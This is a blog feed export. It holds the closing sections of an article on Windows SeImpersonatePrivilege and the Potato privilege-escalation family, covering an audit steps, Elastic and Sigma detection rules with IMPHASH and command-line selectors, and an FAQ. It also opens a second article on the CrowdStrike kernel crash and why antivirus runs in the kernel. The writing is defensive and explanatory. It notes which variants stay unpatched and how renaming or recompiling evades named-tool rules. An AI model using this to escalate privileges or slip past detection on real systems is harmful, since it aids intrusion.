*Hidden behind a spoiler intentionally, so a skimming reader does not accidentally remove the privilege from production NETWORK SERVICE.* Open `gpedit.msc` (or the Group Policy Management Console for a domain-joined host). Navigate Computer Configuration -&amp;gt; Windows Settings -&amp;gt; Security Settings -&amp;gt; Local Policies -&amp;gt; User Rights Assignment -&amp;gt; Impersonate a client after authentication. The right-hand pane lists the SIDs holding the privilege. Note the current list. Do not change it. Compare it against the audit output from Section 10.1. If the local list and the AccessChk output disagree, you have a domain-pushed policy override worth tracing. If they agree and you have a documented business reason to remove a specific account, change the policy for that specific account only, and confirm on a non-production host that the dependent services still function.
&lt;h3&gt;10.3 Detection signatures&lt;/h3&gt;
&lt;p&gt;Detection in this space breaks into two abstractions: &lt;em&gt;primitive-level&lt;/em&gt; rules that match the named-pipe pattern every Potato variant generates, and &lt;em&gt;named-tool&lt;/em&gt; rules that match a specific binary&apos;s fingerprint.&lt;/p&gt;
&lt;p&gt;The primitive-level open-source reference is the Elastic detection rule &lt;code&gt;Privilege Escalation via Rogue Named Pipe&lt;/code&gt; [@elastic-rogue-named-pipe-rule] (as of June 2026; the cited URL pins to the master HEAD), rule_id &lt;code&gt;76ddb638-abf7-42d5-be22-4a70b0bf7241&lt;/code&gt;. The EQL queries Sysmon Event ID 17 (pipe-creation events) and matches paths in which a &lt;code&gt;\pipe\&lt;/code&gt; token appears after another path segment -- the canonical PrintSpoofer-style relay endpoint fingerprint. Because the rule looks for the pattern every Potato variant produces (a service-account process creating a named pipe whose path embeds a coercion-API hint), it survives binary rename, source-recompile, and most CLI variation.&lt;/p&gt;
&lt;p&gt;The named-tool reference is the SigmaHQ LocalPotato rule [@sigmahq-localpotato-rule] (as of June 2026; the cited URL pins to the master HEAD), rule &lt;code&gt;id 6bd75993-9888-4f91-9404-e1e4e4e34b77&lt;/code&gt;. Three OR-joined selectors: image path ending in &lt;code&gt;\LocalPotato.exe&lt;/code&gt;; CLI fingerprint &lt;code&gt;-i C:\&lt;/code&gt; paired with &lt;code&gt;-o Windows\&lt;/code&gt;; specific IMPHASH selectors &lt;code&gt;E1742EE971D6549E8D4D81115F88F1FC&lt;/code&gt; and &lt;code&gt;DD82066EFBA94D7556EF582F247C8BB5&lt;/code&gt;. Useful as a low-noise IOC tripwire; trivially evaded by binary rename or recompilation.&lt;/p&gt;

The Sigma LocalPotato rule is a perfectly competent detection rule for *the LocalPotato binary distributed at a specific commit*. It is essentially useless against the *technique*. An attacker recompiling LocalPotato from source breaks the IMPHASH selectors; renaming the output binary breaks the image-path selector; rewriting the CLI argument parsing breaks the third selector. The rule is brittle by construction, and the brittleness is structural to named-tool detection. The same point this article makes about Microsoft&apos;s per-CVE patches applies one level down: closing this binary does not close the technique; closing this technique does not close the primitive.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Invest detection budget in the Elastic primitive-level rule (or equivalent) and accept the higher false-positive rate that comes with it. The named-tool rules are a useful low-noise tripwire but should not be the primary signal. The same logic that makes the privilege durable against per-CVE patches makes the named-tool rules ephemeral against re-tooling.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We have walked the eighteen-year history, named the three-piece system, surveyed the mitigations, articulated the Microsoft policy, hit the Hardy ceiling, scanned the open problems, and listed the operational tools. One thing remains: the eight misconceptions practitioners hold about this primitive that the article must explicitly correct.&lt;/p&gt;
&lt;h2&gt;11. FAQ -- Eight Misconceptions That Will Not Die&lt;/h2&gt;

No. UAC (User Account Control) is an interactive-token consent surface for desktop logons; it gates whether an interactive admin can elevate to a full administrator token at consent-prompt time. Service accounts have no interactive logon and never see a UAC prompt. NETWORK SERVICE and LOCAL SERVICE inherit `SeImpersonatePrivilege` in their default token regardless of UAC settings [@ms-learn-localservice; @ms-learn-networkservice]; the Potato chain runs entirely under the service token without ever touching the interactive consent surface.

No. Credential Guard protects long-term credentials (the NTLM hash, the Kerberos TGT) in an isolated user-mode trustlet whose memory the regular kernel cannot read. The Potato lineage does not steal a credential and does not call into LSASS-isolated memory -- see §9.3 for the architectural detail. The operational takeaway: Credential Guard and VBS are orthogonal to runtime token impersonation, and a security team buying VBS in response to Potato writeups is misallocating defensive budget.

Not if the account holds `SeImpersonatePrivilege`. LOCAL SERVICE and NETWORK SERVICE both hold it by default and have it enabled in their default tokens [@ms-learn-localservice; @ms-learn-networkservice]. The gate is the privilege, not the account name. A service that has been &quot;hardened&quot; by moving from SYSTEM to NETWORK SERVICE still has the gate open. Real hardening requires either removing the privilege from the account on that specific host (with the compatibility risks Section 10.2 describes) or running the service under a custom account that does not get the privilege auto-granted.

No. Microsoft has shipped CVEs for specific token-source primitives -- LocalPotato as CVE-2023-21746 [@nvd-cve-2023-21746], SilverPotato as CVE-2024-38061 [@nvd-cve-2024-38061], FakePotato as CVE-2024-38100 [@nvd-cve-2024-38100], the three-phase DCOM hardening as CVE-2021-26414 [@nvd-cve-2021-26414] -- but the underlying impersonation surface is documented-as-policy not to be addressed as a security boundary [@msrc-windows-security-servicing-criteria; @pierini-cocomazzi-troopers24-talk]. GodPotato remains functional across its tested README matrix (Server 2012-2022 / Windows 8-11) with no public Microsoft patch through mid-2026 [@beichendream-godpotato-readme]. PrintSpoofer and CoercedPotato variants remain functional on most hosts [@labro-2020-printspoofer-post; @prepouce-coercedpotato-repo]. The pattern is per-CVE closure of individual variants while the underlying privilege + coercion-API geometry remains in place.

Both, but the architectural responsibility is Windows&apos;s. The privilege is a Windows design decision; the coerced-authentication primitives are Windows components (RPCSS, Print Spooler, EFS RPC server). A service developer cannot opt out of `SeImpersonatePrivilege` by writing better code -- the SCM grants the privilege as part of the account setup, not at the developer&apos;s request. A service developer *can* run under a custom account configured without the privilege, but most service code paths assume impersonation works (especially Win32-era code, where `RpcImpersonateClient` is the standard idiom) and break in subtle ways without it.

Yes. IIS application pools cannot perform Windows-authenticated user impersonation; Exchange cannot run mailbox operations under the connecting user&apos;s identity; SQL Server cannot enforce per-login row security under Windows authentication; the SMB and EFS RPC servers cannot impersonate their callers [@ms-learn-impersonate-policy; @ms-learn-impersonatenamedpipeclient]. The MSRC policy text on the impersonation-policy page is explicit that the privilege is required for legitimate impersonation [@ms-learn-impersonate-policy]. Audit before you remove.

No. The Adminless / Administrator Protection feature is a per-action consent surface for interactive administrators [@ms-learn-admin-protection]. Service accounts (services, MSAs, gMSAs, virtual accounts) are out of scope by construction because none of them is an interactive admin account. The new boundary does not apply to the service-account population this article is about. There is no public Microsoft roadmap to extend it.

Because the named-pipe RPC server population (the SMB redirector, the Print Spooler, the EFS RPC server, and the long tail of pre-modern Win32 services) depends on this specific API, and the Microsoft-recommended alternatives (`RpcImpersonateClient`, the LSA-side variants) ultimately compose into the same kernel-side call -- §7.3 walks through the full ABI migration cost. The MSRC servicing carve-out [@msrc-windows-security-servicing-criteria] is the policy-level acknowledgement that the cost is not on the table.
&lt;h2&gt;12. The Line, Re-read&lt;/h2&gt;
&lt;p&gt;Bring the reader back to where this started: one line in &lt;code&gt;whoami /priv&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SeImpersonatePrivilege  Impersonate a client after authentication  Enabled
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now you know what it means. The line ships in the default token of every IIS application pool worker, every SQL Server service step, every Exchange worker process, and every other LOCAL SERVICE / NETWORK SERVICE-derived account on every shipping Windows release. The line gates &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;. The kernel-level token-substitution surface sits behind that gate. The named-pipe coercion API on the other side of the gate has shipped since Windows XP / Server 2003 and remains the dominant token source on the platform. Microsoft has shipped five containment mitigations in nineteen years -- each closes a real surface; none closes this primitive. The doctrinal articulation came at Troopers 24: Windows Service Hardening is a &lt;em&gt;safety&lt;/em&gt; boundary, not a &lt;em&gt;security&lt;/em&gt; boundary [@pierini-cocomazzi-troopers24-talk]. The 1988 ceiling that explains why is older than the operating system.&lt;/p&gt;

Microsoft gave every NETWORK SERVICE a privilege that, in the wrong hands, is equivalent to SYSTEM. They knew -- the MSRC said as much in April 2009 [@msrc-blog-2009-04-token-kidnapping]. They could not change it without breaking the service model: every closure path carries a documented compatibility cost they have explicitly declined to accept [@msrc-windows-security-servicing-criteria]. Pierini and Cocomazzi made the doctrine quotable at Troopers 24 [@pierini-cocomazzi-troopers24-talk]: WSH is a safety boundary, not a security boundary. Roughly eighteen years after Cerrudo first put that fact on the record [@cerrudo-2008-pdf], ten years after HotPotato made it pushbutton [@breen-2016-hot-potato], and three years after GodPotato survived the most aggressive DCOM hardening Microsoft has shipped [@beichendream-godpotato-readme; @nvd-cve-2021-26414], the primitive is still in place. It is not unpatched. It is documented-as-policy not to be patched.
&lt;p&gt;For the variant-by-variant chronology this article deliberately deferred -- HotPotato, RottenPotato, JuicyPotato, JuicyPotatoNG, PrintSpoofer, EfsPotato, CoercedPotato, RoguePotato, RemotePotato0, GodPotato, LocalPotato, SilverPotato, FakePotato -- see the sibling Potato Family article (2026-05-31). That article catalogues each named tool&apos;s CLSID, coercion primitive, and patch state. This one was about why the family exists at all.&lt;/p&gt;
&lt;p&gt;The one line in &lt;code&gt;whoami /priv&lt;/code&gt; is not a bug. It is the decision.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;seimpersonateprivilege-and-the-service-account-attack-surface&quot; keyTerms={[
  { term: &quot;SeImpersonatePrivilege&quot;, definition: &quot;Windows user right (constant SE_IMPERSONATE_NAME) that gates CreateProcessWithTokenW and the higher-level forms of ImpersonateNamedPipeClient; default-assigned and enabled on LOCAL SERVICE, NETWORK SERVICE, and Administrators.&quot; },
  { term: &quot;ImpersonateNamedPipeClient&quot;, definition: &quot;Win32 API by which a named-pipe-server thread receives the connected client&apos;s access token; shipped since Windows XP / Server 2003; the dominant token-source primitive on the platform.&quot; },
  { term: &quot;Confused Deputy&quot;, definition: &quot;Norm Hardy&apos;s 1988 name for the structural attack class in which a server holds more authority than its clients and acts on client requests, with no architectural way to keep the two authorities apart. The Potato lineage is the Windows-specific instantiation.&quot; },
  { term: &quot;Primary Token vs Impersonation Token&quot;, definition: &quot;Two flavours of the Windows access-token kernel object: primary tokens attach to processes for the process lifetime; impersonation tokens attach to individual threads and override the primary token for the thread&apos;s access checks.&quot; },
  { term: &quot;Impersonation Level&quot;, definition: &quot;Four-value enum (Anonymous, Identification, Impersonation, Delegation) carried on every impersonation token. Only Impersonation and Delegation tokens can be used to spawn a process under the borrowed identity.&quot; },
  { term: &quot;OXID Resolver&quot;, definition: &quot;The DCOM service that maps an OXID (Object Exporter Identifier) to the RPC binding string for a marshalled COM object. The Rotten/Juicy Potato chain forges OBJREF blobs with attacker-controlled OXID resolver fields.&quot; },
  { term: &quot;Windows Service Hardening (WSH)&quot;, definition: &quot;Microsoft&apos;s umbrella term for the post-2003 service-account mitigation stack (Service SIDs, restricted tokens, integrity levels, LPAC variants). Documented-as-policy a safety boundary, not a security boundary.&quot; },
  { term: &quot;Service SID&quot;, definition: &quot;A SID of the form NT SERVICE\\, generated as the SHA1 hash of the uppercased service name, attached to a service-process token to permit per-service ACLs without granting them to every service sharing the account.&quot; },
  { term: &quot;Restricted Token&quot;, definition: &quot;A token carrying a restricting-SID set in addition to its regular group SIDs; the kernel grants access only when both sets satisfy the ACL. Used to limit a compromised service&apos;s write surface.&quot; },
  { term: &quot;MSRC Servicing Criteria&quot;, definition: &quot;Microsoft&apos;s public policy document defining what counts as a security boundary for servicing purposes. The two-question test gates whether a vulnerability is addressed via a security update or merely considered for a future release.&quot; }
]} questions={[
  { q: &quot;Why does NETWORK SERVICE hold SeImpersonatePrivilege by default?&quot;, a: &quot;Because the 2003 service-hardening pivot moved services off NT AUTHORITY\\SYSTEM, but those services still needed to impersonate their RPC clients to enforce per-user access. The privilege was created as the named user right that lets the new low-privileged accounts keep doing what SYSTEM had implicitly done.&quot; },
  { q: &quot;What three components combine into the three-piece theorem of section 5?&quot;, a: &quot;(1) SeImpersonatePrivilege default-assigned to LOCAL SERVICE and NETWORK SERVICE; (2) the ImpersonateNamedPipeClient coercion API shipped since Windows XP / Server 2003; (3) the MSRC servicing-criteria carve-out treating WSH as a safety boundary rather than a security boundary.&quot; },
  { q: &quot;Why did MS09-012 not close the Potato family?&quot;, a: &quot;Because MS09-012 (the bulletin behind Cerrudo&apos;s &lt;em&gt;Chimichurri&lt;/em&gt; PoC) closed the specific handle-leak surface Cerrudo&apos;s 2008 disclosure used. It did not revoke SeImpersonatePrivilege, did not modify CreateProcessWithTokenW, and did not modify ImpersonateNamedPipeClient. The MSRC blog explicitly acknowledged on the record that the privilege was sufficient for the escalation but elected to fix the symptom, not the gate.&quot; },
  { q: &quot;What is the difference between primitive-level and named-tool detection, and why does it matter?&quot;, a: &quot;Primitive-level detection (e.g., the Elastic rogue-named-pipe rule) matches the pattern every Potato variant generates regardless of binary identity; named-tool detection (e.g., the Sigma LocalPotato rule) matches a specific binary&apos;s fingerprint via IMPHASH and CLI selectors. Named-tool detection is trivially evaded by rename or recompile; primitive-level detection survives re-tooling at the cost of a higher false-positive rate.&quot; },
  { q: &quot;If GodPotato is patchable in principle, why has Microsoft not patched it?&quot;, a: &quot;Because patching GodPotato requires changing either RPCSS&apos;s OXID-handling logic or the LSASS cached-token logic Forshaw documented in April 2020 -- both structural properties whose modification would cascade through dozens of dependent components. The MSRC servicing-criteria carve-out frames the broader class as a safety boundary, so individual variants in that class do not receive security-update servicing. GodPotato sits squarely in the carved-out region.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-internals</category><category>privilege-escalation</category><category>access-tokens</category><category>service-hardening</category><category>potato-family</category><category>msrc</category><category>confused-deputy</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Seventy-Eight Minutes That Evicted Antivirus From the Windows Kernel</title><link>https://paragmali.com/blog/seventy-eight-minutes-that-evicted-antivirus-from-the-window/</link><guid isPermaLink="true">https://paragmali.com/blog/seventy-eight-minutes-that-evicted-antivirus-from-the-window/</guid><description>How a CrowdStrike channel-file update on July 19, 2024 collapsed twenty years of resistance to evicting third-party AV from the Windows kernel.</description><pubDate>Tue, 02 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
At 04:09 UTC on July 19, 2024, a CrowdStrike Falcon channel-file update -- not a driver update, but a small data file consumed by an in-kernel interpreter -- crashed approximately 8.5 million Windows hosts in seventy-eight minutes. The technical bug was a parameter count mismatch the content validator missed; the architectural bug was that the dangerous code was already in the kernel. Microsoft&apos;s response, the Windows Resiliency Initiative, commits to a multi-year migration of third-party endpoint security out of kernel mode -- a Vista-era idea finally given political license to ship. Whether user-mode EDR with hypervisor-assisted introspection can match twenty-five years of kernel-mode hooking coverage is the article&apos;s open architectural question, and the honest mid-2026 answer is &quot;we do not yet know.&quot;
&lt;h2&gt;1. 04:09 UTC, Friday, July 19, 2024&lt;/h2&gt;
&lt;p&gt;At 04:09 UTC on Friday, July 19, 2024, a CrowdStrike Falcon Cloud release pipeline pushed a &lt;em&gt;Rapid Response Content&lt;/em&gt; file -- not a sensor binary, not a driver update, but a small piece of data named in the &lt;code&gt;C-00000291-*.sys&lt;/code&gt; channel-file naming convention -- to the production rollout channel for Falcon Sensor on Windows [@cs-pir-2024-07-24]. The release engineer at the rollout console saw the indicator move from staging to production. Sixty-six minutes later, by Microsoft&apos;s own count, approximately 8.5 million Windows hosts had bug-checked and were either rebooting into a kernel panic or already stuck in one [@ms-bradsmith-2024-07-20]. Delta and United pulled gates. The U.K. National Health Service diverted patients away from impacted trusts. Public-safety answering points went degraded across several U.S. states [@crs-if12717-everycrsreport]. CrowdStrike&apos;s release pipeline reverted the bad content at 05:27 UTC -- seventy-eight minutes after it had been pushed -- and the rollout indicator on the CrowdStrike side went from red back to green [@cs-pir-2024-07-24]. The rollout indicator on every customer machine that had already received the bad content went, and stayed, blue. The dangerous code was already in the kernel; the update had only handed it a fatal input.&lt;/p&gt;
&lt;p&gt;That single fact -- that a &lt;em&gt;content&lt;/em&gt; update could brick eight and a half million machines without the code path that consumed the content ever being treated as a code path -- is the whole reason this article exists.&lt;/p&gt;
&lt;h3&gt;The numbers, anchored to primary sources&lt;/h3&gt;
&lt;p&gt;Brad Smith, Microsoft&apos;s vice chair and president, published his &quot;8.5 million Windows devices&quot; figure on July 20, 2024 -- the morning after the incident -- and the phrase is unchanged in any Microsoft document since: &lt;em&gt;&quot;we currently estimate that CrowdStrike&apos;s update affected 8.5 million Windows devices, or less than one percent of all Windows machines&quot;&lt;/em&gt; [@ms-bradsmith-2024-07-20]. The U.S. Government Accountability Office later framed the incident as &lt;em&gt;&quot;potentially one of the largest IT outages in history&quot;&lt;/em&gt; [@gao-24-107733]. The U.S. Cybersecurity and Infrastructure Security Agency opened a running advisory the same day, anchored to its own July 19, 2024 alert, that has been updated continuously since [@cisa-alert-2024-07-19]. The Congressional Research Service&apos;s IF12717 brief lays out the public-safety blast radius -- FAA ground stops, 911 PSAP degradation, hospital systems falling back to paper -- and Adam Meyers, CrowdStrike&apos;s Senior Vice President for Counter Adversary Operations, was sworn in before the House Homeland Security Committee&apos;s Cybersecurity Subcommittee on September 24, 2024 to answer for it [@crs-if12717-everycrsreport, @homeland-hearing-page, @cyberscoop-meyers].&lt;/p&gt;
&lt;h3&gt;The fault, as Microsoft&apos;s dump shows it&lt;/h3&gt;
&lt;p&gt;Eight days after the outage, on July 27, 2024, Microsoft&apos;s security team published a primary-source post-mortem [@ms-secblog-2024-07-27]. The dump&apos;s load-bearing fields, condensed and relabeled below for readability (Microsoft&apos;s actual labels are &lt;code&gt;READ_ADDRESS&lt;/code&gt;, &lt;code&gt;IMAGE_NAME&lt;/code&gt;, &lt;code&gt;FAULTING_MODULE&lt;/code&gt;, with the faulting instruction inside the &lt;code&gt;.trap&lt;/code&gt; disassembly and &lt;code&gt;KiPageFault&lt;/code&gt; inside the stack trace):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;READ_ADDRESS: ffff840500000074 Paged pool
IMAGE_NAME:   csagent.sys
FAULTING_IP:  csagent+e14ed
              mov  r9d, dword ptr [r8]
CALLED_FROM:  nt!KiPageFault+0x369
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Read low to high, every line answers a different question. &lt;code&gt;csagent.sys&lt;/code&gt; is the CrowdStrike Falcon kernel driver. &lt;code&gt;csagent+e14ed&lt;/code&gt; is the offset of the faulting instruction inside that driver. &lt;code&gt;mov r9d, dword ptr [r8]&lt;/code&gt; is that instruction -- a single x86-64 move that loads a 32-bit value from the memory address in register &lt;code&gt;r8&lt;/code&gt; into register &lt;code&gt;r9d&lt;/code&gt;. The address in &lt;code&gt;r8&lt;/code&gt; was &lt;code&gt;0xffff840500000074&lt;/code&gt;, in the high half of the kernel virtual address space, which the labelling &quot;Paged pool&quot; suggests the memory manager classifies as paged kernel memory -- but at that specific virtual address, on this machine, at this instant, no page table entry mapped a physical page. The CPU raised a page fault. Windows delivered the fault to &lt;code&gt;nt!KiPageFault+0x369&lt;/code&gt;. The kernel bug-checked with &lt;code&gt;PAGE_FAULT_IN_NONPAGED_AREA&lt;/code&gt; [@ms-secblog-2024-07-27, @ms-bradsmith-2024-07-20].&lt;/p&gt;
&lt;p&gt;There is one piece of information the WinDBG dump does &lt;em&gt;not&lt;/em&gt; publish, and the article is going to be careful about it: the IRQL value at the moment of the fault. No primary source records whether &lt;code&gt;csagent.sys&lt;/code&gt; was at PASSIVE_LEVEL, APC_LEVEL, DISPATCH_LEVEL, or higher when the page fault triggered. What every primary source agrees on is the &lt;em&gt;consequence&lt;/em&gt;: the fault occurred at an interrupt request level high enough that the kernel could not unwind to a structured exception handler in any meaningful way, and the operating system stopped. Treat any third-party post that asserts a specific IRQL value for Channel File 291 as speculation unless it cites a primary source that publishes the value.&lt;/p&gt;

sequenceDiagram
    participant Cloud as Falcon Cloud Rollout
    participant Sensor as Falcon Sensor (user mode)
    participant Driver as csagent.sys (kernel)
    participant Kernel as Windows Kernel
    participant Disk as Local Disk
    Cloud-&amp;gt;&amp;gt;Sensor: 04:09 UTC push of Channel File 291
    Sensor-&amp;gt;&amp;gt;Disk: Persist channel file
    Sensor-&amp;gt;&amp;gt;Driver: Load Template Instance into in-kernel interpreter
    Driver-&amp;gt;&amp;gt;Driver: Index 21st parameter slot
    Driver-&amp;gt;&amp;gt;Kernel: Dereference unmapped kernel address 0xffff840500000074
    Kernel-&amp;gt;&amp;gt;Kernel: nt!KiPageFault, then bug check 0x50
    Note over Kernel: PAGE_FAULT_IN_NONPAGED_AREA, host blue screens
    Cloud-&amp;gt;&amp;gt;Cloud: 05:27 UTC, revert bad content
    Note over Cloud,Disk: New hosts are saved, already-affected hosts are not
    Disk-&amp;gt;&amp;gt;Driver: On reboot, csagent.sys re-reads the persisted file
    Driver-&amp;gt;&amp;gt;Kernel: Same fault path executes again
&lt;p&gt;The persistence-across-reboot pathology is the part most contemporary coverage understated. CrowdStrike reverted the bad content from the cloud rollout pipeline 78 minutes after pushing it [@cs-pir-2024-07-24]. But the file was already on disk on every machine that had received it. On reboot, &lt;code&gt;csagent.sys&lt;/code&gt; loaded again, parsed the persisted file again, and bug-checked again. The fix required either a manual safe-mode deletion -- the canonical &quot;boot, delete &lt;code&gt;C-00000291*.sys&lt;/code&gt;, reboot&quot; runbook that circulated on Reddit, social media, and vendor advisories that morning -- or, later, Microsoft&apos;s purpose-built recovery tool [@mslearn-qmr].&lt;/p&gt;
&lt;p&gt;That is what happened. The next question -- the one this article exists to answer -- is &lt;em&gt;why&lt;/em&gt; the dangerous code was already in the kernel in the first place, what twenty-five years of architectural decisions put it there, and what it took to begin to undo those decisions. To get there, we have to start in 1999.&lt;/p&gt;
&lt;h2&gt;2. Why Antivirus Lives in the Kernel&lt;/h2&gt;
&lt;p&gt;Imagine you are a security engineer in 1999. Your assignment is to detect a virus that has installed itself between the user-mode file APIs and the on-disk file system, so that when a scanner running as a user reads the file, the virus serves up a clean copy of the bytes and hides the infected ones. Where do you put the observer?&lt;/p&gt;
&lt;p&gt;If you think about it for a minute, you converge on the same answer Microsoft, Symantec, Network Associates, Trend Micro, and every other antivirus vendor converged on in the late 1990s: you put the observer &lt;em&gt;below&lt;/em&gt; the thing that is lying. In Windows terms, &quot;below&quot; means kernel mode. On x86, that is Ring 0. In NT terminology, that is the privilege level at which all the operating system primitives -- the file system, the process manager, the memory manager -- actually live.&lt;/p&gt;

A per-processor priority value Windows uses to gate code execution against hardware and software interrupts. Code running at PASSIVE_LEVEL (zero) can be preempted by almost anything; code running at DISPATCH_LEVEL or higher cannot take page faults on pageable memory and must complete quickly. Kernel drivers must obey strict IRQL rules; violations -- such as touching pageable memory at DISPATCH_LEVEL -- produce immediate bug checks rather than recoverable exceptions.
&lt;h3&gt;The 1999 to 2003 transition&lt;/h3&gt;
&lt;p&gt;The first generation of Windows antivirus, on Windows 9x and NT 4.0, ran almost entirely in user mode and lost the argument with the first rootkits to ship in the wild. A scanner that runs in the same protection ring as the malware it is hunting cannot, by construction, see what the malware has chosen to hide from anything in that ring. The fix, by the late 1990s and the early 2000s, was to push the scanner into Ring 0.&lt;/p&gt;
&lt;p&gt;Two specific Windows kernel primitives carried that fix.&lt;/p&gt;
&lt;p&gt;The first was the &lt;em&gt;minifilter&lt;/em&gt;: a kernel driver attached to the I/O manager&apos;s file system stack at a specific altitude, intercepting &lt;code&gt;IRP_MJ_CREATE&lt;/code&gt;, &lt;code&gt;IRP_MJ_READ&lt;/code&gt;, &lt;code&gt;IRP_MJ_WRITE&lt;/code&gt;, and friends, so the antivirus could examine the file &lt;em&gt;before&lt;/em&gt; the file system returned the bytes to user mode [@mslearn-filter-drivers]. Microsoft formalized the Filter Manager as the supported way to do this -- and by the mid-2000s the legacy &lt;code&gt;sfilter&lt;/code&gt; model was deprecated in favor of the structured minifilter model. Every shipping Windows antivirus in 2026 still has a minifilter driver loaded as part of its boot-time stack.&lt;/p&gt;

A kernel driver registered through the Windows Filter Manager that attaches to one or more file system volumes at a specific *altitude* (a Microsoft-assigned numeric priority) and receives pre-operation and post-operation callbacks for each file system operation. Antivirus minifilters use this hook point to scan a file before user-mode code sees the bytes returned from disk.
&lt;p&gt;The second was the &lt;em&gt;process-create kernel callback&lt;/em&gt;. Beginning with Windows 2000 and extended for synchronous block authority in Windows Vista SP1 (alongside Windows Server 2008), the documented function &lt;code&gt;PsSetCreateProcessNotifyRoutine&lt;/code&gt; (and later &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt;) lets a kernel driver register to be called whenever the kernel is about to create a new process, with the option in the extended variant to set &lt;code&gt;CreationStatus = STATUS_ACCESS_DENIED&lt;/code&gt; and synchronously block the create [@mslearn-pssetcreateprocessnotifyroutine, @mslearn-pssetcreateprocessnotifyroutineex]. This is the kernel primitive that lets an EDR vendor say &quot;process X is about to spawn &lt;code&gt;cmd.exe&lt;/code&gt; with these arguments, and we are denying the create&quot; without ever exiting the kernel. Companion callbacks exist for image-load events, thread-create events, registry operations [@mslearn-cmregistercallback], and handle-access events [@mslearn-obregistercallbacks]. Together they form the documented Generation-2 vendor API surface for EDR primitives, the architectural substrate every modern Windows EDR sits on top of.&lt;/p&gt;
&lt;h3&gt;The rootkit pressure&lt;/h3&gt;
&lt;p&gt;The second pressure that pushed antivirus down into the kernel came from the attackers themselves. By the mid-2000s, kernel-mode rootkits were a routine part of the malware writer&apos;s toolkit. The most pernicious variants used a technique called Direct Kernel Object Manipulation: instead of installing themselves anywhere a defender could observe via documented APIs, they walked Windows internal data structures and unlinked themselves from the lists the operating system traversed when answering questions like &quot;what processes are running?&quot; or &quot;what kernel modules are loaded?&quot;&lt;/p&gt;

A rootkit technique that modifies in-memory Windows kernel data structures directly -- for example, unlinking an `EPROCESS` block from the active process list so that `nt!PsActiveProcessHead` traversal does not enumerate the malicious process. Because the modification is invisible to any code that asks the kernel to enumerate via the documented APIs, the only defenders that can see DKOM are those that walk kernel memory authoritatively from a vantage equal to or below the rootkit itself.
&lt;p&gt;To catch a Ring-0 rootkit, you needed a Ring-0 defender. Symantec, McAfee, Trend Micro, and Kaspersky all converged on the same answer in the early 2000s, and every commercial Windows EDR architecture in 2026 still reflects that convergence.The lineage from DOS-era signature scanners (one-process, no privilege boundary) through Win9x scanners (no privilege boundary either) through NT-era minifilters (a privilege boundary, with the scanner across the boundary from the malware) to 2024-era in-kernel content interpreters (a privilege boundary, with the scanner &lt;em&gt;and&lt;/em&gt; a rule engine &lt;em&gt;and&lt;/em&gt; an unsigned content channel all on the same side of the boundary) is a small case study in how an architecture persists long after the original constraints relax.&lt;/p&gt;
&lt;p&gt;Architectural decisions made under one set of constraints have a way of outliving the constraints that produced them. The 1999 decision to put antivirus in the kernel was rational at the time -- it was the only place from which you could authoritatively see what a process or a file system actually did. Twenty-five years later, that decision produced &lt;code&gt;csagent.sys&lt;/code&gt; running in &lt;code&gt;Ring 0&lt;/code&gt; on 8.5 million machines, indexing past the end of a parameter array on a Friday morning in July.&lt;/p&gt;
&lt;p&gt;But the move into the kernel did not go uncontested. Microsoft itself spent two years between 2005 and 2007 trying to claw back at least part of that ground. The first attempt was called Kernel Patch Protection, and the political fight it produced is the story of the next section.&lt;/p&gt;
&lt;h2&gt;3. The Vista PatchGuard Battle, 2005-2007&lt;/h2&gt;

Either everybody has access to the kernel, or nobody does. -- Stephen Toulouse, Microsoft senior product manager, InformationWeek, October 2006 [@informationweek-2006-toulouse]
&lt;p&gt;The political question at the heart of this article is twenty years old. It is also binary in a way that very few political questions ever are: Microsoft&apos;s stated position in 2006 was not &quot;we will permit some vendors to modify the kernel and deny others,&quot; nor &quot;we will run an accreditation scheme,&quot; nor &quot;we will charge for kernel-mode signing certificates.&quot; The stated position was that &lt;em&gt;either&lt;/em&gt; every vendor on Earth could modify the Windows kernel &lt;em&gt;or&lt;/em&gt; no vendor could, and the only stable answer was the second one. That argument, made by a Microsoft senior product manager in trade press in 2006, reverberates without modification into the November 2024 Windows Resiliency Initiative announcement.&lt;/p&gt;
&lt;h3&gt;What Kernel Patch Protection actually does&lt;/h3&gt;
&lt;p&gt;Kernel Patch Protection -- commonly called PatchGuard -- shipped with x64 editions of Windows XP, Windows Server 2003 Service Pack 1, and the launch x64 edition of Windows Vista, beginning in 2005 [@wiki-kpp]. Microsoft updated it in August 2007 via Security Advisory 932596, which is the canonical Microsoft primary document for the program [@ms-advisory-932596].&lt;/p&gt;

A Windows kernel feature on x64 builds that periodically verifies the integrity of selected critical kernel structures -- the System Service Descriptor Table (SSDT), the Interrupt Descriptor Table (IDT), the Global Descriptor Table (GDT), the kernel image, the Hardware Abstraction Layer (HAL), and the NDIS network stack. If PatchGuard detects modification it triggers bug check `0x109` `CRITICAL_STRUCTURE_CORRUPTION` and the operating system stops [@wiki-kpp].
&lt;p&gt;What PatchGuard &lt;em&gt;does&lt;/em&gt; is enforce an invariant: third-party code may not modify a specific list of kernel data structures, and if it does, the system bug-checks. What PatchGuard &lt;em&gt;does not&lt;/em&gt; do is prevent third-party drivers from loading. PatchGuard is a structural integrity check, not a load-time policy. The Vista-era plan was for vendors to migrate from inline hooks of the SSDT to the documented callback APIs of the previous section -- &lt;code&gt;PsSetCreateProcessNotifyRoutine&lt;/code&gt;, &lt;code&gt;ObRegisterCallbacks&lt;/code&gt;, &lt;code&gt;CmRegisterCallback&lt;/code&gt;, the Filter Manager [@mslearn-pssetcreateprocessnotifyroutine, @mslearn-obregistercallbacks, @mslearn-cmregistercallback, @mslearn-filter-drivers] -- and &lt;code&gt;csagent.sys&lt;/code&gt; is the lineal descendant of that migration: a fully documented, fully callback-based, fully Generation-2 driver. PatchGuard did exactly what it was designed to do, and &lt;code&gt;csagent.sys&lt;/code&gt; was perfectly compatible with it.&lt;/p&gt;
